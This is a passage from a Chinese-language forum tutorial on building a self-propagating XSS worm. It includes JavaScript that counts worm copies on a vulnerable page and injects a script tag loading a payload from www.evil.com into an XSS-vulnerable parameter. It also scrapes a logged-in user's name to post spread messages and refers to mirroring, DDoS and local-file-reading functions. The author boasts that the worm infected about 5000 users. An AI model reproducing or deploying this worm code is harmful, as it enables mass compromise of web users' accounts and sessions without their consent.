        navigator.Actual_Name=Actual_Name;

        navigator.Actual_Version=Actual_Version;

        

        this.Name=Actual_Name;

        this.Version=Actual_Version;

    }

    browserinfo();

    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Miscrosoft Internet Explorer"){//调用IE读取本地敏感文件}

    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Fire fox"){//调用Firefox读取本地敏感文件}

    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Opera"){//调用Opera读取本地敏感文件}

    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Google Chrome"){//调用Google Chrome读取本地敏感文件}
复制代码随后可以选择调用镜象网页并且发送功能.参考上面的镜象代码
复制代码随后可以选择调用DDOS功能.参考上面的DDOS代码
复制代码然后,在感染和传播功能发作之前,我们要判断当前页面有没有蠕虫存在,如果有,有多少只.如果虫的数量足够,我们就不要再植入蠕虫了.只要保证一定的数量就好.xmlHttpReq.open("GET","http://vul.com/vul.jsp", false);  //读取某页面.

xmlHttpReq.send(null);

var resource = xmlHttpReq.responseText;

var id=0;var result;

var patt = new RegExp("bugbug.js","g");     //这里是蠕虫的关键词,用以确定页面有多少只虫.譬如如果你的虫在bugbug.js,那么就可以搜索这个JS在页面内的数量.

while ((result = patt.exec(resource)) != null)  {

id++;

}
复制代码然后,我们根据数量,来做下一步的操作.先判断,如果数量太少,我们就要让蠕虫感染起来.if(id<2){     //这里我们假设要求那个页面蠕虫的数量要有2只.

no=resource.search(/my name is/);

var wd=‘<script src="http://www.evil.com/bugbug.js"</script>‘;        //wd是存在XSS漏洞的变量.我们在这里写入JS代码.

var post="wd="+wd;

xmlHttpReq.open("POST","http://www.vul.com/vul.jsp",false);        //把感染代码 POST出去.

xmlHttpReq.setRequestHeader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");

xmlHttpReq.setRequestHeader("content-length",post.length);

xmlHttpReq.setRequestHeader("content-type","application/x-www-form-urlencoded");

xmlHttpReq.send(post);

}
复制代码如果虫的数量已经足够,那么我们就执行蠕虫:else{

var no=resource.search(/my name is/);     //这里是访问一个授权页面里,取得用户的名称.备份,并将来用在需要填写名称的地方

var namee=resource.substr(no+21,5);     //这里是重组用户名,条件是随便写的.具体情况当然要不同获得.

var wd="Support!"+namee+"<br>";        //这里就发出去了一个你指定的MESSAGE.当然,你可以把数据存入一组数组,random读取.

var post="wd="+wd;

xmlHttpReq.open("POST","http://vul.com/vul.jsp",false);

xmlHttpReq.setRequestHeader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");

xmlHttpReq.setRequestHeader("content-length",post.length);

xmlHttpReq.setRequestHeader("content-type","application/x-www-form-urlencoded");

xmlHttpReq.send(post);                 //把传播的信息 POST出去.

}
复制代码-----------------------------------------------------总结-------------------------------------------------------------------



本次教程案例中的蠕虫曾经测试成功并且感染了约5000名用户.
蠕虫仅仅是一个载体,在这个载体上,我们可以实现各种各样的功能.
操作JS调用COM,你的想象力有多大,蠕虫能力就有多大.这也是为什么国外黑客往往喜欢写蠕虫的原因.








本文引用文档资料:

"HTTP Request Smuggling" (Chaim Linhart, Amit Klein, Ronen Heled and Steve Orrin, June 2005)
Other XmlHttpRequest tricks (Amit Klein, January 2003)
"Cross Site Tracing" (Jeremiah Grossman, January 2003)
http://armorize-cht.blogspot.com 阿碼科技非官方中文 Blog
空虚浪子心BLOG http://www.inbreak.net
Xeye Team http://xeye.us/


转帖请注明版权信息:
http://bbs.tian6.com/thread-12711-1-1.html
By racle@tian6.com

XSS的高级利用部分总结 -蠕虫